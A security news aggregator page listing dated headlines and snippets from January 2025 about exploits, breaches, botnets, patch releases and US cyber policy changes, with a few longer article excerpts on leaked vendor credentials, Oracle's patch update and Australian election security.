Security News
The latest news for cybersecurity collected from vast security websites.
2025-01-23 00:46:20
FBI/CISA Share Details on Ivanti Exploits Chains: What Network Defenders Need to KnowThe US government shared exploit chains, IOCs and post-incident forensics data to help network defenders hunt for signs of Chinese hacking gangs. The post FBI/CISA Share Details on Ivanti Exploits Chains: What Network Defenders Need to Know appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 22:17:08
Trump Overturns Biden Rules on AI Development, SecurityThe new administration moved quickly to remove any constraints on AI development and collected $500 billion in investment pledges for an American-owned AI joint venture.
by Dark Reading
2025-01-22 22:01:27
Pwn2Own Automotive 2025 Day 1: organizers awarded $382,750 for 16 zero-daysTrend Micro’s Zero Day Initiative (ZDI) announced that $380K was awarded on Day 1 of Pwn2Own Automotive 2025. Trend Micro’s Zero Day Initiative (ZDI) announced that over $380,000 was awarded on Day 1 of Pwn2Own Automotive 2025, a hacking contest that was held in Tokyo. In total, the organizers awarded $382,750 for 16 unique working […]
by Security Affairs
2025-01-22 21:53:22
Announcing the 2025 State of Application Risk ReportUse the data and analysis in this report to prioritize your 2025 AppSec efforts.
by Legit Security
2025-01-22 21:47:00
Trump Terminates DHS Advisory Committee Memberships, Disrupting Cybersecurity ReviewThe new Trump administration has terminated all memberships of advisory committees that report to the Department of Homeland Security (DHS). ""In alignment with the Department of Homeland Security''s (DHS) commitment to eliminating the misuse of resources and ensuring that DHS activities prioritize our national security, I am directing the termination of all current memberships on advisory
by The Hacker News
2025-01-22 21:06:52
BreachForums admin to be resentenced after appeals court slams supervised releaseA three-judge panel vacated a controversial district court decision that set free Conor Fitzpatrick, the administrator of the massive illicit marketplace, after just 17 days in prison.
by The Record
2025-01-22 20:49:41
Chinese Cyberspies Target South Korean VPN in Supply Chain AttackAdvanced persistent threat group PlushDaemon, active since 2019, is using a sophisticated modular backdoor to collect data from infected systems in South Korea.
by Dark Reading
2025-01-22 20:48:33
Two ransomware groups abuse Microsoft’s Office 365 platform to gain access to target organizationsTwo ransomware groups exploiting Microsoft 365 services and default settings to target internal enterprise users. Sophos researchers started investigating two distinct clusters of activity, tracked as STAC5143 and STAC5777, in response to customer ransomware attacks in November and December 2024. Threat actors used their own Microsoft 365 tenants and exploited a default Teams setting allowing […]
by Security Affairs
2025-01-22 20:35:23
Zendesk’s Subdomain Registration Exposed to Phishing, Pig Butchering ScamsCloudSEK uncovers a Zendesk vulnerability allowing cybercriminals to exploit subdomains for phishing and investment scams. Learn about the…
by Hackread
2025-01-22 20:24:12
Trump Pardons 'Silk Road'' Dark Web Drug Market CreatorThe pardon comes after 11 years in prison for Ross Ulbricht, who was sentenced to life without parole on several charges, including computer hacking, distribution of narcotics, and money laundering.
by Dark Reading
2025-01-22 19:23:00
Hackers Exploit Zero-Day in cnPilot Routers to Deploy AIRASHI DDoS BotnetThreat actors are exploiting an unspecified zero-day vulnerability in Cambium Networks cnPilot routers to deploy a variant of the AISURU botnet called AIRASHI to carry out distributed denial-of-service (DDoS) attacks. According to QiAnXin XLab, the attacks have leveraged the security flaw since June 2024. Additional details about the shortcomings have been withheld to prevent further abuse. Some
by The Hacker News
2025-01-22 19:12:53
China-linked hacker group targets victims in East Asia with malicious VPN installersThe group compromised a virtual private network installer developed by the South Korean firm IPany to deploy custom malware on victims'' devices.
by The Record
2025-01-22 19:00:20
The best travel VPNs of 2025: Expert tested and reviewedA VPN is an excellent tool to protect your privacy while away from home. We tested the best VPNs for travel, and our favorites provide strong security, speed, and streaming capabilities.
by ZDNET Security
2025-01-22 18:54:55
Account Credentials for Security Vendors Found on Dark WebAccount credentials from some of the biggest cybersecurity vendors can be purchased on dark web marketplaces, according to a Cyble report published today. While most of the security credentials Cyble found were for customers of those vendors – likely captured by infostealers that infected customer devices – there were also an alarming number of leaked account credentials from the security vendors themselves for sensitive internal accounts for enterprise, development and security systems. The accounts ideally should have been protected by multifactor authentication (MFA), which would have made exploiting the credentials more difficult, but Cyble noted that the leaked credentials show the importance of dark web monitoring as a defense against much bigger cyberattacks like data breaches and ransomware attacks. Security Company Credentials Can Be Bought for $10 The credentials could be bought for as little as $10 in cybercrime marketplaces, Cyble said, noting that they were likely harvested from infostealer logs and then sold in bulk on dark web marketplaces. Cyble looked only at credentials leaked since the start of the year, as older passwords are more likely to have changed. Of the 14 cybersecurity vendors Cyble examined, each had both customer and internal credentials leaked on the dark web thus far in 2025. The vendors mainly offer enterprise and cloud security tools and services, but some consumer security vendors were included too. Cyble did not publish the names at the request of vendors. Most of the credentials found by Cyble appeared to be customer credentials that protect access to security management and account interfaces, but all the security vendors Cyble examined had access to internal systems leaked on the dark web too. Security vendor credentials found by Cyble included some for sensitive internal systems such as Okta, Jira, GitHub, AWS, Microsoft Online, Salesforce, SolarWinds, Box, WordPress, Oracle and Zoom, plus other password managers, authentication systems and device management platforms. Cyble said it didn’t test to see if the credentials were valid, but noted that many were for “easily accessible web console interfaces, SSO logins and other web-facing account access points.” One of the largest vendors Cyble looked at appeared to have sensitive internal company accounts exposed, with company email addresses “listed among the credentials for a number of sensitive accounts, including developer and product account interfaces and customer data.” “Depending on the privileges granted to those accounts, the exposure could be substantial,” Cyble noted. Dark Web Credential Leaks a Boon for Hackers Besides the obvious hacking potential, Cyble noted that exposed accounts could also help threat actors conduct reconnaissance “by giving them an idea of the systems that a potential target uses, including locations of sensitive data and potential vulnerabilities to exploit. Other sensitive information exposed by infostealers could include URLs of management interfaces that are unknown to the public, giving further recon information to hackers.” Cyble concluded that “If the largest security vendors can be hit by infostealers, so can any organization, making basic cybersecurity practices like MFA, zero trust, vulnerability management and network segmentation important for minimizing – and ideally preventing – data breaches, ransomware and other cyberattacks.” Updated at 1:28 a.m. UTC January 23, 2025: Vendor names were removed to preserve confidentiality.
by The Cyber Express
2025-01-22 18:49:53
Trump admin tells all Democrats on intelligence oversight board to resignThe Trump administration has requested all Democratic members of an independent board meant to keep tabs on U.S. government intelligence efforts to resign, three people familiar with the matter told Recorded Future News.
by The Record
2025-01-22 18:44:13
Trump pardons Silk Road founder Ross UlbrichtThe new president kept a promise to libertarian supporters that he would pardon Ross Ulbricht, the founder of the Silk Road dark web marketplace, who was convicted a decade ago of charges related to drug distribution, illegal hacking, identity theft and money laundering.
by The Record
2025-01-22 18:19:54
Stratoshark: Wireshark for the cloud – now available!Stratoshark is an innovative open-source tool that brings Wireshark’s detailed network visibility to the cloud, providing users with a standardized approach to cloud observability. Stratoshark incorporates much of Wireshark’s codebase, including its user interface elements. The interface and workflows will feel instantly recognizable for those already acquainted with Wireshark. By integrating Wireshark’s functionality with Falco’s capabilities (a cloud-native security tool that provides runtime security across hosts, containers, Kubernetes, and cloud environments), Stratoshark delivers contextual visibility … More → The post Stratoshark: Wireshark for the cloud – now available! appeared first on Help Net Security.
by Help Net Security
2025-01-22 18:07:54
Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS AttackCloudflare mitigates a record-breaking 5.6 Tbps DDoS attack, highlighting the growing threat of hyper-volumetric assaults. Learn about the…
by Hackread
2025-01-22 17:59:46
Critical zero-days impact premium WordPress real estate pluginsThe RealHome theme and the Easy Real Estate plugins for WordPress are vulnerable to two critical severity flaws that allow unauthenticated users to gain administrative privileges. [...]
by BleepingComputer
2025-01-22 17:53:15
3 extensions to use for anonymous browsing - and what that even meansIf you value your privacy, it''s time to start using your web browser wisely. If you don''t want to switch browsers, try one of these browser extensions to simplify browsing anonymously.
by ZDNET Security
2025-01-22 17:41:17
Iran and Russia deepen cyber ties with new agreementThe pact between the world’s two most sanctioned nations aims to elevate relations ""to a new level,” the Kremlin said.
by The Record
2025-01-22 17:24:34
DHS Disbands Cyber Safety Review Board, Ending One of CISA’s Few Bright SpotsThe Trump administration has disbanded the Cyber Safety Review Board (CSRB), ending one of the few bright spots at CISA. The post DHS Disbands Cyber Safety Review Board, Ending One of CISA’s Few Bright Spots appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 17:01:00
Application Security Firm DryRun Raises $8.7 Million in Seed FundingDryRun Security has raised $8.7 million in a seed funding round for its AI-powered application security solutions. The post Application Security Firm DryRun Raises $8.7 Million in Seed Funding appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 17:00:00
The Future Of The CISO - Part 2 - Jess Burn, Jeff Pollard - BSW #379
by SC Media
2025-01-22 16:45:03
Pwn2Own Automotive Kicks Off With $382,000 Bounty Paid on Day OneThe first day of Pwn2Own Automotive 2025 saw security researchers successfully exploit multiple in-vehicle infotainment (IVI) systems and electric vehicle (EV) chargers, uncovering 16 previously unknown (zero-day) vulnerabilities. A total of $382,750 was awarded to participants, with researchers demonstrating exploits ranging from buffer overflows to OS command injection flaws. Pwn2Own Automotive, hosted by Trend Micro’s … The post Pwn2Own Automotive Kicks Off With $382,000 Bounty Paid on Day One appeared first on CyberInsider.
by Cyber Insider
2025-01-22 16:38:08
Trump administration fires members of cybersecurity review board in ‘horribly shortsighted’ decisionThe Department of Homeland security told members of the Cyber Safety Review Board that their membership was terminated. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-22 16:36:58
IPany VPN Breached by Hackers Planting Backdoor on InstallerA China-aligned APT group dubbed PlushDaemon has executed a supply-chain attack on IPany, a South Korean VPN provider, by embedding a sophisticated backdoor named SlowStepper into its installer. According to ESET researchers, the attack, which began in late 2023, targeted users across South Korea, Japan, and China, with particular focus on industries like semiconductors and … The post IPany VPN Breached by Hackers Planting Backdoor on Installer appeared first on CyberInsider.
by Cyber Insider
2025-01-22 16:32:26
Cloudflare CDN flaw leaks user location data, even through secure chat appsA security researcher discovered a flaw in Cloudflare''s content delivery network (CDN), which could expose a person''s general location by simply sending them an image on platforms like Signal and Discord. [...]
by BleepingComputer
2025-01-22 16:01:00
Discover Hidden Browsing Threats: Free Risk Assessment for GenAI, Identity, Web, and SaaS RisksAs GenAI tools and SaaS platforms become a staple component in the employee toolkit, the risks associated with data exposure, identity vulnerabilities, and unmonitored browsing behavior have skyrocketed. Forward-thinking security teams are looking for security controls and strategies to address these risks, but they do not always know which risks to prioritize. In some cases, they might have
by The Hacker News
2025-01-22 16:00:00
President Trump Pardons Silk Road Creator Ross Ulbricht After 11 Years in PrisonU.S. President Donald Trump on Tuesday granted a ""full and unconditional pardon"" to Ross Ulbricht, the creator of the infamous Silk Road drug marketplace, after spending 11 years behind bars. ""I just called the mother of Ross William Ulbricht to let her know that in honor of her and the Libertarian Movement, which supported me so strongly, it was my pleasure to have just signed a full and
by The Hacker News
2025-01-22 15:35:44
Telegram captcha tricks you into running malicious PowerShell scriptsThreat actors on X are exploiting the news around Ross Ulbricht to direct unsuspecting users to a Telegram channel that tricks them into executing PowerShell code that infects them with malware. [...]
by BleepingComputer
2025-01-22 15:33:55
Conduent confirms outage was due to a cybersecurity incidentU.S. government contractor Conduent, which provides technology to support services such as child support and food assistance, has confirmed that a recent outage was caused by a cybersecurity incident.  Conduent confirmed the disruption, which left some U.S. residents without access to support payments, to TechCrunch on Tuesday but declined to say whether the outage was […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-22 15:27:44
Doti AI Raises $7 Million Seed Funding for Instant Access to Internal Company DataDoti''s platform uses AI to improve, automate, and streamline standard office and business processes across distributed and hybrid environments. The post Doti AI Raises $7 Million Seed Funding for Instant Access to Internal Company Data appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 15:24:41
MasterCard DNS Error Went Unnoticed for YearsThe payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.
by Krebs on Security
2025-01-22 15:17:24
High-severity flaw in file archiver 7-Zip requires manual updateThe vulnerability could enable attackers to use nested archives to bypass Windows security warnings.
by SC Media
2025-01-22 15:03:26
Script Searched: How 2024’s Biggest Client-Side Attacks Left Millions of Websites ExposedClient-side security breaches in 2024 highlight the urgent need for robust monitoring and defense against third-party script vulnerabilities.
by ITPro Today
2025-01-22 15:00:54
CVE-2025-0411 – vulnerability in 7-Zip | Kaspersky official blogA vulnerability CVE-2025-0411 in the 7-Zip file archiver allows bypassing the Mark-of-the-Web (MOTW) mechanism.
by Kaspersky
2025-01-22 15:00:00
Will 2025 See a Rise of NHI Attacks?The flurry of non-human identity attacks at the end of 2024 demonstrates extremely strong momentum heading into the new year. That does not bode well.
by Dark Reading
2025-01-22 14:54:59
Mirai botnet behind the largest DDoS attack to dateResearchers have uncovered two Mirai-based botnets harnessing Internet of Things (IoT) devices to DDoS target organizations around the world. The Murdoc botnet Qualys researchers have laid bare the “Murdoc” botnet, consisting of some 1,300 IoT devices saddled with a variant of the Mirai malware that exploits vulnerabilities to compromise AVTECH Cameras and Huawei HG532 routers. “In this latest campaign we note the utilization of ELF file and Shell Script execution, which leads to the deployment … More → The post Mirai botnet behind the largest DDoS attack to date appeared first on Help Net Security.
by Help Net Security
2025-01-22 14:54:24
4 Ways to Mature Your Human Risk Management ProgramHuman risk management (HRM) is now the primary approach to addressing the ongoing need for strong security cultures in organizations of all sizes. HRM focuses on more than just security awareness training (SAT) delivered at regular intervals. The goal is a positive security culture through:
by KnowBe4
2025-01-22 14:54:06
Is classic Outlook crashing when you start or reply to an email? A fix is on the wayA fix is due out in late January. For now, Microsoft has a workaround.
by ZDNET Security
2025-01-22 14:53:44
Russian Spear-Phishing Campaign Targets WhatsApp AccountsThe Russian threat actor “Star Blizzard” has launched a spear-phishing campaign attempting to compromise WhatsApp accounts, according to researchers at Microsoft. The operation targets individuals who are involved in providing assistance to Ukraine.
by KnowBe4
2025-01-22 14:53:14
Malvertising Campaign Abuses Google Ads to Target AdvertisersResearchers at Malwarebytes are tracking a major malvertising campaign that’s abusing Google Ads to target individuals and businesses interested in advertising.
by KnowBe4
2025-01-22 14:50:00
How Falco and Wireshark paved the way for StratosharkThe origins of Sysdig, Falco, and Wireshark can be traced back to one fundamental need: making sense of complex, real-time... The post How Falco and Wireshark paved the way for Stratoshark appeared first on Sysdig.
by Sysdig
2025-01-22 14:50:00
Stratoshark: Extending Wireshark’s legacy into the cloudThere is nothing more exciting (or nerve-wracking) than sharing something you’ve created with the world. Over 25 years ago, we... The post Stratoshark: Extending Wireshark’s legacy into the cloud appeared first on Sysdig.
by Sysdig
2025-01-22 14:49:18
Persona helps businesses detect and prevent AI-driven fraudPersona announced significant advancements in its AI-based face spoof detection capabilities. These updates strengthen Persona’s ability to detect and prevent increasingly sophisticated generative AI fraud techniques. AI-based face spoofs – such as deepfakes, synthetic faces, and face morphs – have enabled fraudsters to scale attacks at an unprecedented pace. For businesses that rely on identity verification, this poses growing risks, from significant financial losses to reputational damage. Gartner predicts that by 2026, attacks using AI-generated deepfakes on face … More → The post Persona helps businesses detect and prevent AI-driven fraud appeared first on Help Net Security.
by Help Net Security
2025-01-22 14:45:11
Stealing HttpOnly cookies with the cookie sandwich techniqueIn this post, I will introduce the ""cookie sandwich"" technique which lets you bypass the HttpOnly flag on certain servers. This research follows on from Bypassing WAFs with the phantom $Version cookie
by PortSwigger Research
2025-01-22 14:42:43
Report Finds 50% of Scattered Spider Phishing Domains Targeted Finance & InsurancePhishing dominated cyber attacks in H2 2024, accounting for over 90% of incidents across industries due to its simplicity and effectiveness.
by ReliaQuest
2025-01-22 14:34:24
Rimini Protect AHS safeguards against security breachesRimini Street announced Rimini Protect Advanced Hypervisor Security (AHS), an exclusive solution powered by proven Vali Cyber AI/ML security technology. The Rimini Protect AHS solution leverages these innovative capabilities that are already protecting mission-critical hypervisor infrastructure, including US military VMware deployments. The Rimini Protect AHS solution combines Vali Cyber technology with Rimini Street’s professional hardening, installation, and managed services. This solution creates a secure, locked-down hypervisor environment, 24/7/365, allowing businesses to manage hypervisor risk. Hypervisor … More → The post Rimini Protect AHS safeguards against security breaches appeared first on Help Net Security.
by Help Net Security
2025-01-22 14:22:53
Fake Homebrew site leverages Google ads to target macOS, Linux devicesAttackers drop infostealer malware that grabs credentials, web browser data, and crypto wallets.
by SC Media
2025-01-22 14:20:42
What PowerSchool isn’t saying about its ‘massive’ student data breachThe hack has the potential to be one of the biggest of the year, but the edtech giant is refusing to answer important questions © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-22 14:19:00
PlushDaemon APT Targets South Korean VPN Provider in Supply Chain AttackA previously undocumented China-aligned advanced persistent threat (APT) group named PlushDaemon has been linked to a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023, according to new findings from ESET. ""The attackers replaced the legitimate installer with one that also deployed the group''s signature implant that we have named SlowStepper – a
by The Hacker News
2025-01-22 14:09:40
Call for Presentations Open for SecurityWeek’s 2025 Supply Chain Security & Third-Party Risk SummitJoin Us in Shaping the Future of Supply Chain Security - Don’t miss this chance to be part of the conversation addressing one of the most pressing cybersecurity challenges . The post Call for Presentations Open for SecurityWeek’s 2025 Supply Chain Security & Third-Party Risk Summit appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 14:00:00
2024 Cloud Threat Landscape Report: How does cloud security fail?Organizations often set up security rules to help reduce cybersecurity vulnerabilities and risks. The 2024 Cost of a Data Breach Report discovered that 40% of all data breaches involved data distributed across multiple environments, meaning that these best-laid plans often fail in the cloud environment. Not surprisingly, many organizations find keeping a robust security posture […] The post 2024 Cloud Threat Landscape Report: How does cloud security fail? appeared first on Security Intelligence.
by Security Intelligence
2025-01-22 14:00:00
Cyber Insights 2025: APIs – The Threat ContinuesAPIs are easy to develop, simple to implement, and frequently attacked. They are prime and lucrative targets for cybercriminals. The post Cyber Insights 2025: APIs – The Threat Continues appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 14:00:00
Trustwave SpiderLabs 2025 Trustwave Risk Radar Report: Energy and Utilities SectorThe energy sector plays a crucial role in national security by ensuring the delivery of essential infrastructure services and supporting transportation systems. Acknowledging the need to safeguard this vital industry, Trustwave SpiderLabs has published the highly detailed 2025 Trustwave Risk Radar Report: Energy and Utilities Sector.
by SpiderLabs Blog
2025-01-22 13:47:56
Cisco warns of denial of service flaw with PoC exploit codeCisco has released security updates to patch a ClamAV denial-of-service (DoS) vulnerability, which has proof-of-concept (PoC) exploit code. [...]
by BleepingComputer
2025-01-22 13:34:23
Over $380,000 Paid Out on First Day of Pwn2Own Automotive 2025$380,000 paid out on the first day of Pwn2Own Automotive 2025 for exploits targeting car infotainment units, operating systems, and chargers. The post Over $380,000 Paid Out on First Day of Pwn2Own Automotive 2025 appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 13:33:13
7-Zip bug could allow a bypass of a Windows security feature. Update nowA vulnerability in 7-Zip that could allow attackers to bypass the MotW security feature in Windows has been patched.
by Malwarebytes Labs
2025-01-22 13:07:03
Trump Pardons Silk Road Founder Ross Ulbricht, Calls Prosecutors ‘Scum’President Trump pardons Silk Road founder Ross Ulbricht, slamming prosecutors as “scum.” The move reignites debates on cybercrime…
by Hackread
2025-01-22 13:00:10
Lookout Mobile Intelligence APIs identifies cross-platform attacksLookout announced their new Lookout Mobile Intelligence Application Programming Interfaces (APIs), exponentially expanding the scope of visibility into enterprise mobile security data. Lookout Mobile Intelligence APIs integrate critical security data from mobile devices into the solutions already in use by security teams – those like SIEM, SOAR, and XDR. This enables security teams to identify cross-platform attacks, risky trends or abnormalities, and potential risks. Mobile devices have become the cornerstone of modern organizations, allowing employees … More → The post Lookout Mobile Intelligence APIs identifies cross-platform attacks appeared first on Help Net Security.
by Help Net Security
2025-01-22 12:55:00
Oracle Releases January 2025 Patch to Address 318 Flaws Across Major ProductsOracle is urging customers to apply its January 2025 Critical Patch Update (CPU) to address 318 new security vulnerabilities spanning its products and services. The most severe of the flaws is a bug in the Oracle Agile Product Lifecycle Management (PLM) Framework (CVE-2025-21556, CVSS score: 9.9) that could allow an attacker to seize control of susceptible instances. ""Easily exploitable
by The Hacker News
2025-01-22 12:52:40
Oracle January 2025 Critical Patch Update Addresses 186 CVEsOracle addresses 186 CVEs in its first quarterly update of 2025 with 318 patches, including 30 critical updates.BackgroundOn January 21, Oracle released its Critical Patch Update (CPU) for January 2025, the first quarterly update of the year. This CPU contains fixes for 186 CVEs in 318 security updates across 27 Oracle product families. Out of the 318 security updates published this quarter, 9.4% of patches were assigned a critical severity. Medium severity patches accounted for the bulk of security patches at 56.6%, followed by high severity patches at 32.4%.This quarter’s update includes 30 critical patches across 18 CVEs.SeverityIssues PatchedCVEsCritical3018High10355Medium180109Low54Total318186AnalysisThis quarter, the Oracle REST Data Services product family contained the highest number of patches at 85, accounting for 26.7% of the total patches, followed by Oracle Health Sciences Applications at 39 patches, which accounted for 12.3% of the total patches.A full breakdown of the patches for this quarter can be seen in the following table, which also includes a count of vulnerabilities that can be exploited over a network without authentication.Oracle Product FamilyNumber of PatchesRemote Exploit without AuthOracle REST Data Services8559Oracle Health Sciences Applications394Oracle Communications Applications3124Oracle Graph Server and Client2815Oracle Construction and Engineering2621Oracle Analytics2314Oracle Communications2218Oracle Hospitality Applications166Oracle Java SE63Oracle MySQL64Oracle Database Server52Oracle Secure Backup41Oracle TimesTen In-Memory Database41Oracle Commerce33Oracle Big Data Spatial and Graph20Oracle E-Business Suite21Oracle Financial Services Applications20Oracle Fusion Middleware21Oracle Hyperion22Oracle Insurance Applications21Oracle PeopleSoft20Oracle Application Express10Oracle Blockchain Platform11Oracle Essbase11Oracle GoldenGate11Oracle Enterprise Manager11Oracle JD Edwards10SolutionCustomers are advised to apply all relevant patches in this quarter’s CPU. Please refer to the January 2025 advisory for full details.Identifying affected systemsA list of Tenable plugins to identify these vulnerabilities will appear here as they’re released. This link uses a search filter to ensure that all matching plugin coverage will appear as it is released.Get more informationOracle Critical Patch Update Advisory - January 2025Oracle January 2025 Critical Patch Update Risk MatricesOracle Advisory to CVE MapJoin Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2025-01-22 12:49:45
Murdoc Botnet Ensnaring Avtech, Huawei DevicesThe Mirai-based Murdoc botnet has been actively targeting Avtech and Huawei devices for roughly half a year. The post Murdoc Botnet Ensnaring Avtech, Huawei Devices appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 12:42:42
Oracle Patches 200 Vulnerabilities With January 2025 CPUOracle has released 318 new security patches to address roughly 200 unique CVEs as part of its January 2025 Critical Patch Update. The post Oracle Patches 200 Vulnerabilities With January 2025 CPU appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 12:39:06
PowerSchool hacker claims they stole data of 62 million studentsThe hacker who breached education tech giant PowerSchool claimed in an extortion demand that they stole the personal data of 62.4 million students and 9.5 million teachers. [...]
by BleepingComputer
2025-01-22 12:27:22
48,000+ internet-facing Fortinet firewalls still open to attackDespite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet Fortigate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. CVE-2024-55591 exploitation On January 10, Artic Wolf Labs researchers outlined an attack campaign targeting FortiGate firewalls with management interfaces exposed on the public internet by exploiting a zero-day vulnerability. It involved attackers scanning … More → The post 48,000+ internet-facing Fortinet firewalls still open to attack appeared first on Help Net Security.
by Help Net Security
2025-01-22 12:25:30
DataDome DDoS Protect detects application layer-based threatsDataDome unveiled DDoS Protect, a cloud-based service designed to block distributed denial-of-service (DDoS) attack traffic at the edge before it overwhelms an organization’s infrastructure. DDoS Protect provides always-on, full-stack protection that detects and mitigates application layer-based threats, including evasive and short-lived Layer 7 DDoS attacks, within milliseconds. The solution safeguards businesses against service downtime, wasted resources, and reputational damage resulting from DDoS attacks. Layer 7 DDoS attacks are among the most challenging cybersecurity threats to … More → The post DataDome DDoS Protect detects application layer-based threats appeared first on Help Net Security.
by Help Net Security
2025-01-22 12:08:31
ITOps and DevOps Trends and Predictions 2025 From Industry InsidersIT leaders and industry insiders share their IT operations & management and DevOps predictions for 2025.
by ITPro Today
2025-01-22 12:01:01
Record-Breaking DDoS Attack Reached 5.6 TbpsCloudflare saw a 53% increase in DDoS attack frequency last year, when it blocked a record-breaking 5.6 Tbps attack. The post Record-Breaking DDoS Attack Reached 5.6 Tbps appeared first on SecurityWeek.
by SecurityWeek
2025-01-22 12:00:00
How Should IT Help Desks Deal With Difficult Users?Dealing with ill-mannered users can be one of the toughest parts of a help desk role. Learn practical strategies for staying professional during challenging interactions.
by ITPro Today
2025-01-22 11:56:49
Conduent confirms cybersecurity incident behind recent outageAmerican business services giant and government contractor Conduent confirmed today that a recent outage resulted from what it described as a ""cyber security incident."" [...]
by BleepingComputer
2025-01-22 11:49:00
Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT DevicesWeb infrastructure and security company Cloudflare on Tuesday said it detected and blocked a 5.6 Terabit per second (Tbps) distributed denial-of-service (DDoS) attack, the largest ever attack to be reported to date. The UDP protocol-based attack took place on October 29, 2024, targeting one of its customers, an unnamed internet service provider (ISP) from Eastern Asia. The activity originated
by The Hacker News
2025-01-22 11:04:52
Australia’s 2025 Federal Election: EIAT Highlights Key Threats to Electoral IntegrityAs Australia prepares for its 2025 federal election, concerns surrounding the integrity of the electoral process have become a focal point. The Electoral Integrity Assurance Taskforce (EIAT) has played a critical role in highlighting various risks to the country''s democratic systems, offering strategic guidance and support to the Australian Electoral Commissioner to ensure a secure and fair election. The Electoral Integrity Assurance Taskforce (EIAT), established to protect the electoral process, has released a detailed report outlining a range of threats that could potentially compromise the 2025 Australian federal election. The EIAT''s role is pivotal in providing consolidated, expert advice to the Australian Electoral Commissioner, ensuring the integrity of the election through careful monitoring of various vulnerabilities, including foreign interference, cybersecurity, misinformation, and physical security concerns. The Four Key Threats Identified by the EIAT According to the EIAT''s latest report, four main areas of concern have been identified as cyber threats to the upcoming election: Foreign Interference Australia, like many democracies around the world, is not immune to attempts by foreign powers to undermine the electoral process. Foreign interference can take many forms, ranging from spreading disinformation to directly influencing candidates. The EIAT report highlights that while these actions are often difficult to trace, foreign interference remains a growing and prolific threat. The Australian government has already taken proactive measures to protect the integrity of its elections, including the establishment of the Counter-Foreign Interference Taskforce. This taskforce works in tandem with agencies like the Australian Federal Police (AFP) and the Australian Security Intelligence Organisation (ASIO) to mitigate these risks. Physical Security The report also identifies concerns over physical security, especially in light of increased domestic tensions. The rise in anti-government rhetoric and protest activity has sparked fears that protests, if not managed appropriately, could disrupt the electoral process. The Australian Federal Police (AFP) has reported a sharp increase in criminal activity targeting federal parliamentarians, including threats, intimidation, and attacks on parliamentarian offices. Ensuring the safety of both candidates and voters is vital to maintaining a secure election process, and the government is committed to mitigating these risks through close collaboration between various law enforcement agencies. CyberSecurity Cybersecurity has emerged as one of the most pressing concerns ahead of the 2025 election. With the increasing digitalization of election systems, malicious cyber actors—ranging from state-sponsored hackers to cybercriminals and hacktivists—pose a substantial threat to the electoral infrastructure. The EIAT has expressed concern that these actors could disrupt the election, tamper with sensitive data, or undermine public confidence. To counter these risks, the Australian Signals Directorate (ASD) has been working closely with government agencies to enhance the country''s cyber defense systems. The Australian Electoral Commissioner is also coordinating with ASD to safeguard the integrity of the election by reviewing potential cyber threats and reinforcing the security of voting systems and data. Misinformation and Disinformation The spread of misinformation and disinformation has become increasingly prevalent, particularly on social media platforms. These false narratives can mislead voters and erode public trust in the electoral process. The Electoral Integrity Assurance Taskforce has warned that disinformation could be used as a tool of foreign interference, but it is often spread domestically by individuals or groups with political motives. The Australian Electoral Commissioner is launching initiatives like the ""Stop and Consider"" campaign to help voters critically evaluate the information they encounter online, promoting digital media literacy to combat misleading or false claims. Public Awareness and Support from the EIAT The Electoral Integrity Assurance Taskforce has published several important documents to inform the public, candidates, and political parties about the security landscape of the upcoming election. These documents include the Election Security Environment Overview, which outlines the four key threat vectors mentioned above, and A Candidate’s Guide to the Changing Electoral Environment, which offers valuable resources for political candidates and their teams. This guide provides information on staying safe, understanding legal obligations, and reporting any threats they might encounter during the election campaign. Dr. Kath Gleeson, the EIAT Board Chair, emphasized the importance of these resources in ensuring that both voters and candidates remain informed about the challenges facing the electoral process. Dr. Gleeson stated, “This will ensure voters and candidates have access to important information about safeguarding the next federal election.” She also reiterated the taskforce''s commitment to maintaining the public''s trust in the electoral system, ensuring that the election remains fair, transparent, and secure. Conclusion As the 2025 Australian federal election approaches, the Electoral Integrity Assurance Taskforce is playing a vital role in coordinating efforts to protect the election process. By addressing critical threats such as foreign interference, cyberattacks, physical security risks, and misinformation, the taskforce is working proactively to protect the integrity of the election. In collaboration with the Australian Electoral Commissioner, the taskforce aims to ensure that all Australians can vote with confidence. As the campaign period intensifies, it is crucial for the public, candidates, and political parties to stay vigilant and report any suspicious activity, supporting the collective effort to uphold Australia’s democratic values and secure a fair and transparent election.
by The Cyber Express
2025-01-22 10:55:00
Threat Spotlight: Tycoon 2FA phishing kit updated to evade inspectionPhishing-as-a-Service (PhaaS) provides attackers with advanced toolsets and templates that enable them to quickly deploy phishing campaigns.
by Barracuda
2025-01-22 10:49:32
2024 Most Inspiring Women in Cyber Winners: Where Are They Now?Over the past five years, The Most Inspiring Women in Cyber Awards have celebrated some of the most exceptional women from across the cybersecurity industry. From new starters and students to CEOs and CISOs, the awards aim to celebrate outstanding individuals at every level of the industry. No deed is too small for recognition and […] The post 2024 Most Inspiring Women in Cyber Winners: Where Are They Now? appeared first on IT Security Guru.
by IT Security Guru
2025-01-22 10:44:07
